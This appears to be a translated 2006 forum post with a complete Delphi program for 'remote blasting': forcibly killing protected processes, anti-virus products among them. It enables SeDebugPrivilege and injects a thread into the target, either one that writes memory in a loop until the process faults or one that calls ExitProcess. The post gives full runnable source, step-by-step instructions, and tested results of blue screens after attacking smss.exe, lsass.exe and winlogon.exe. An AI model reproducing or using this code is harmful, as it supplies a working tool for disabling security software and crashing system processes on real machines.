The old way to end a process is OpenProcess, then TerminateProcess. But when you run into programs that hook TerminateProcess, or kernel-mode programs (such as many anti-virus products), you are powerless: TerminateProcess either changes nothing, or your own program dies on the spot... I have long been thinking about other ways to end a process, for example running in kernel mode myself... Here is a very simple way of remotely blasting the target program. Bluntly put, you insert a thread into the target and have it execute a piece of crashing code, so the target dies from the inside. It is like planting a bomb inside the target, hence "remote blasting".

Implementation principle:

1. First, how to crash the target program. Everyone has run into a program crash, but do you still remember how to write the code for one? (Who would remember code that crashes?) I don't know how to write it either, so let me tell you the simplest way: just pass 0 as the start address to CreateRemoteThread, so the new thread tries to read and write the memory at 0. That is exactly the dialog "The instruction at "0x00000000" referenced memory at "0x00000000". The memory could not be "read"." That is the goal. To be safe, though, it is better to write a piece of code that is certain to crash; after all, that is more reliable. In fact the target can be ended without such violence. Do you still remember ExitProcess? The exit API that can only be used inside your own program: just inject its address, $7C81CAA2 (see below for details). That is like handing someone a knife and letting him commit suicide...

2. There are plenty of examples of injecting threads, so they are skipped here. Note that for processes in kernel mode you cannot run CreateRemoteThread at the same level. Also, it is best to escalate to the debug privilege first, otherwise don't expect the remote injection to work.

Program implementation (all the code is on the second floor):

1. EnabledDebugPrivilege(True); // escalate to the debug privilege (copied code)

2. Get the process ID and put it in SC_pID.
   hRemoteProcess := OpenProcess(PROCESS_CREATE_THREAD + { allow remote thread creation } PROCESS_VM_OPERATION + PROCESS_VM_WRITE, { allow remote VM operation and remote VM write } False, SC_pID);

3. Get the address of ExitProcess ($7C81CAA2 under XP):
   pfnStartAddr := GetProcAddress(GetModuleHandle('kernel32'), 'ExitProcess');

4. The old method: start the remote thread at $7C81CAA2.
   hThread := CreateRemoteThread(hRemoteProcess, nil, 0, pfnStartAddr, nil, 0, TempVar);
   Steps 3 and 4 can also be combined to make this simpler. The second nil is the parameter for ExitProcess; we want to call ExitProcess(0) anyway, so nil is passed. Run it and you see QQ close without a sound, and Word too, but lsass.exe won't budge: ExitProcess gets no response at all. In that case we blast it directly.

5. Modify the CreateRemoteThread call:
   hThread := CreateRemoteThread(hRemoteProcess, nil, 0, Pointer($0), Pointer($10000), 0, TempVar);
   Target lsass.exe! Up pops "lsass.exe - Application Error: The instruction at "0x00000000" referenced memory at "0x00000000". The memory could not be "read"." After that, OpenProcess fails, because lsass has been killed. However, for processes in kernel mode such as smss.exe, CreateRemoteThread cannot create the thread directly; check hThread, and run your own program in kernel mode first. winlogon.exe, spoolsv.exe and services.exe get blasted the same way, followed by the long-awaited blue screen...

   Note: don't touch the system processes. That lesson cost me a dozen reboots! By the way, csrss.exe can read address 0 and doesn't die outright, so write the crash code yourself and let Windows tell us "XXX has encountered a problem and needs to close. We are sorry for the inconvenience." That's it!

Other common methods include using VirtualAllocEx to open a large area in the target and WriteProcessMemory to write into it, provided you have sufficient permissions. The complete program code is below: create a console program, paste in the code from the second floor, and run it!

2006-7-25 15:24:03
15:42:25 The complete insertthreads.dpr

program insertthreads;
{ If you haven't understood the whole program, keep the following information:
  Remote process blasting, by wooden piles
  Original post: http://www.delphibbs.com/keylife/iblog_show.asp?xid=23375 }
{$APPTYPE CONSOLE}

uses
  SysUtils, Windows;

var
  inputs: string;
  SC_pID: Integer;
  TempVar: Cardinal;
  hRemoteProcess, hThread: THandle;
  d_Proc_Addr, pfnStartAddr: Pointer;

// Code to be injected into the remote process; it runs there and crashes it.
procedure kemThreads;
asm
  push 0
  pop  eax                    // clear eax
  mov  esi, eax               // zero esi and edi
  mov  edi, eax
@Loop:
  mov  dword ptr [eax], eax   // write memory starting at address 0 until it faults and the process dies
  add  eax, 4
  jmp  @Loop
end;

// Function used for privilege escalation (copied)
function EnabledDebugPrivilege(const bEnabled: Boolean): Boolean;
var
  hToken: THandle;
  tp: TOKEN_PRIVILEGES;
  a: DWORD;
const
  SE_DEBUG_NAME = 'SeDebugPrivilege';
begin
  Result := False;
  if OpenProcessToken(GetCurrentProcess, TOKEN_ADJUST_PRIVILEGES, hToken) then
  begin
    tp.PrivilegeCount := 1;
    LookupPrivilegeValue(nil, SE_DEBUG_NAME, tp.Privileges[0].Luid);
    if bEnabled then
      tp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED
    else
      tp.Privileges[0].Attributes := 0;
    a := 0;
    AdjustTokenPrivileges(hToken, False, tp, SizeOf(tp), nil, a);
    Result := GetLastError = ERROR_SUCCESS;
    CloseHandle(hToken);
  end;
end;

begin
  EnabledDebugPrivilege(True);   // escalate privilege
  Write('Enter the target process PID: ');
  Readln(inputs);
  SC_pID := StrToInt(inputs);
  hRemoteProcess := OpenProcess(PROCESS_CREATE_THREAD +     { allow remote thread creation }
    PROCESS_VM_OPERATION + PROCESS_VM_WRITE,                { allow remote VM operation and remote VM write }
    False, SC_pID);
  // Check hRemoteProcess to see whether OpenProcess succeeded ..

  // Allocate $1000 bytes in the target; the page must be executable or DEP blocks the injected code
  d_Proc_Addr := VirtualAllocEx(hRemoteProcess, nil, $1000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  // Write the kemThreads() function into it
  if not WriteProcessMemory(hRemoteProcess, d_Proc_Addr, @kemThreads, $800, TempVar) then
    Writeln('WriteProcessMemory failed to write the target process.')
  else
  begin
    { Commented out here; it shows how to find the ExitProcess address
    // find the function address
    // ExitProcess (kernel32) $7C81CAA2
    // MessageBoxA (user32)   $77D504EA
    pfnStartAddr := GetProcAddress(GetModuleHandle('kernel32'), 'ExitProcess');
    Write(Format('function address: $%0.8x', [Integer(pfnStartAddr)]));
    }
    Writeln('');
    TempVar := 0;
    // Writeln(Format('writing data at: %0.8x', [Integer(d_Proc_Addr)]));
    // Write complete, execute
    // hThread := CreateRemoteThread(hRemoteProcess, nil, 0, Pointer($0), Pointer($10000), 0, TempVar);
    // The line above is the zero-address brute force from step 5
    hThread := CreateRemoteThread(hRemoteProcess, nil, 0, d_Proc_Addr, nil, 0, TempVar);   // run kemThreads() and scribble over memory
    if hThread = 0 then   // THandle is unsigned; 0 means CreateRemoteThread failed
      Writeln('CreateRemoteThread failed to run the remote thread.');
  end;
  Write('Execution complete');
  Readln(inputs);   // press Enter to end
  // VirtualFreeEx(hRemoteProcess, d_Proc_Addr, $1000, MEM_DECOMMIT);
  CloseHandle(hRemoteProcess);
end.

15:43:03 Attached: the most streamlined ExitProcess method (but it often does not manage to end the process...)

var
  inputs: string;
  SC_pID: Integer;
  TempVar: Cardinal;
  hRemoteProcess, hThread: THandle;
begin
  EnabledDebugPrivilege(True);   // escalate privilege
  SC_pID := { target process ID };
  hRemoteProcess := OpenProcess(PROCESS_CREATE_THREAD + PROCESS_VM_OPERATION + PROCESS_VM_WRITE, False, SC_pID);
  hThread := CreateRemoteThread(hRemoteProcess, nil, 0, Pointer($7C81CAA2), nil, 0, TempVar);
  Writeln('thread inserted, ThreadID ' + IntToStr(TempVar));
  // CloseHandle(hRemoteProcess);
end;

2006-7-25 15:55:22 The ExitProcess method above is the simplest API call; just put it in a button. Make sure to change SC_pID := { target process ID };!

The procedure kemThreads above (push 0 / pop eax / mov esi, eax / mov edi, eax / @Loop: mov dword ptr [eax], eax / add eax, 4 / jmp @Loop) is not the best; maybe you can find more effective crash code. If you have better ideas, remember to reply! I am now studying "Writing Secure Code (2nd edition)"; if I find more malicious code I will post it right away.

(With the crash code above, tested in a VMware virtual machine: injecting smss.exe gives an immediate blue screen. After hitting winlogon.exe I was surprised to find that the shutdown button disappears and only Log Off is left in the Start menu, and the options in Task Manager are all greyed out. Injecting lsass.exe does no real harm: the "shutdown" dialog box appears, and half a minute after cancelling it with shutdown /a there is a blue screen, "unknown hard error"...)